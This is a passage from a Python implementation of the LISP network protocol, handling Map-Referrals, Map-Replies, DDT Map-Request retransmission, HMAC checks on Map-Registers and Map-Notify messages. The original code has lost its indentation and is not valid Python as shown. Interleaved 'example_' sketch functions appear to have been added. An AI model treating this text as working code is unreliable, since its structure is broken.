# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that does NOT match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporary return requested prefix until we have lisp_ms_compute_
# neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group = group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
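#
# example_map_referral_ttl
#
# Illustrative sketch only (not called by the code above): the record TTLs
# chosen in lisp_ms_send_map_referral() per action code can be summarized as
# a small table. The string keys and this helper are hypothetical and exist
# purely for readability.
#
def example_map_referral_ttl(action_name):

    #
    # Only the action codes explicitly handled above are listed here.
    #
    ttl_table = {
        "MS_ACK" : 1440, "MS_NOT_REG" : 1, "DELEGATION_HOLE" : 15,
        "NOT_AUTH" : 0, "SITE_NOT_FOUND" : 15
    }
    return(ttl_table.get(action_name))
#enddef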
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver retransmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
    # Get the referral-node we sent the Map-Request to last time. We need
    # to increment its no-response counter.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and last_node in ref.referral_set):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
    # Did we reach the max number of retries? We are giving up since no
    # replies to this DDT Map-Request have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
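#
# example_retransmit_pattern
#
# Illustrative sketch only: the retransmitters in this file (like the one
# above) follow a common pattern of a capped retry count plus a one-shot
# threading.Timer that re-arms itself. This hypothetical helper shows the
# bare pattern with a caller-supplied send() callback and a state dictionary.
#
def example_retransmit_pattern(send, state, max_retries, interval):
    import threading

    if (state["retries"] >= max_retries): return
    state["retries"] += 1
    send()

    timer = threading.Timer(interval, example_retransmit_pattern,
        [send, state, max_retries, interval])
    timer.start()
#enddef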
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in list(referral.referral_set.values()):
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
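#
# example_pick_by_priority_and_hash
#
# Illustrative sketch only: lisp_get_referral_node() above keeps the set of
# up referral-nodes with the numerically lowest (best) priority and then
# load-splits across them with a hash of the EID pair. This hypothetical
# helper restates the same two steps on plain (priority, updown) tuples.
#
def example_pick_by_priority_and_hash(nodes, hashval):
    best = []
    for priority, updown in nodes:
        if (updown == False): continue
        if (len(best) == 0 or best[0][0] == priority):
            best.append((priority, updown))
        elif (best[0][0] > priority):
            best = [(priority, updown)]
        #endif
    #endfor
    if (len(best) == 0): return(None)
    return(best[hashval % len(best)])
#enddef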
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on an EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
    # If the caller wants us to use the root versus a best-match lookup,
    # do so. We only do this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received from an ITR. The Map-Resolver forwards this
# Map-Request to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl, timestamp):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
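#
# example_map_request_dispatch
#
# Illustrative summary only (not used by the code): lisp_process_map_request()
# above dispatches on the role flags of this process. The hypothetical table
# below restates the role checks and the handler each one invokes.
#
example_map_request_dispatch = [
    ("lisp_i_am_etr", "lisp_etr_process_map_request"),
    ("lisp_i_am_ms", "lisp_ms_process_map_request (+ Map-Referral if DDT)"),
    ("lisp_i_am_mr and not ddt_request", "lisp_mr_process_map_request"),
    ("lisp_i_am_ddt or ddt_request", "lisp_ddt_process_map_request")
]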
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
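#
# example_average_mr_rtt
#
# Illustrative sketch only: with the bookkeeping done in lisp_store_mr_stats()
# above, a rough average RTT for the current 100-reply window could be derived
# as below. This hypothetical helper is not called anywhere in this file.
#
def example_average_mr_rtt(total_rtt, neg_map_replies_received):
    replies_in_window = neg_map_replies_received % 100
    if (replies_in_window == 0): return(0.0)
    return(total_rtt / replies_in_window)
#enddef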
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (multicast == False and eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache.lookup_cache(eid_record.group, True)
if (mc):
mc = mc.lookup_source_cache(eid_record.eid, False)
#endif
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
mrloc = None
rloc_name = None
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
            # Add itr-in timestamp if telemetry data is included in the RLOC
            # record.
#
if (rloc.json):
if (lisp_is_json_telemetry(rloc.json.json_string)):
js = rloc.json.json_string
js = lisp_encode_telemetry(js, ii=itr_in_ts)
rloc.json.json_string = js
#endif
#endif
#
# Store RLOC name for multicast RLOC members records.
#
if (rloc_name == None):
rloc_name = rloc.rloc_name
            #endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
            # different address-family than the received packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc, source, port,
map_reply, ttl, mrloc, rloc_name)
#endif
if (rloc.rloc.is_multicast_address()): mrloc = rloc
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
            # Did keys change for this RLOC? Flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
        # be behind the same NAT as this ITR. This ITR, however, could be
        # behind another NAT or in public address space. We want to mark the
        # private address RLOC unreachable in the latter two cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
                # An RTR should not put RTR RLOCs in its map-cache, but xTRs
                # do. Non-RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
#
# If this is a multicast map-cache entry in an RTR, set map-cache
# TTL small so Map-Requests can be sent more often to capture
# RLE changes.
#
if (lisp_i_am_rtr and eid_record.group.is_null() == False):
mc.map_cache_ttl = LISP_MCAST_TTL
else:
mc.map_cache_ttl = eid_record.store_ttl()
#endif
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents stored in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password.encode(), packet, hashalg).hexdigest()
else:
hashval = hmac.new(password.encode(), packet, hashalg).digest()
#endif
return(hashval)
#enddef
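#
# example_hmac_digests
#
# Illustrative sketch only: lisp_hash_me() above is a thin wrapper around the
# standard hmac module. This hypothetical helper shows the equivalent direct
# calls for the sha1 and sha256 cases, assuming a string password and a bytes
# packet buffer.
#
def example_hmac_digests(packet, password):
    import hmac, hashlib

    sha1_hex = hmac.new(password.encode(), packet, hashlib.sha1).hexdigest()
    sha256_hex = hmac.new(password.encode(), packet, hashlib.sha256).hexdigest()
    return(sha1_hex, sha256_hex)
#enddef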
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
    # Print the differing values if the hashes do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already-built Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (key in lisp_map_notify_queue):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
    # Build RLOC-records for the merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
rloc_record.local_bit = True
rloc_record.probe_bit = False
rloc_record.reach_bit = True
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (key in lisp_map_notify_queue):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (key in lisp_map_notify_queue):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
    # Set retransmit timer if this is an unsolicited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
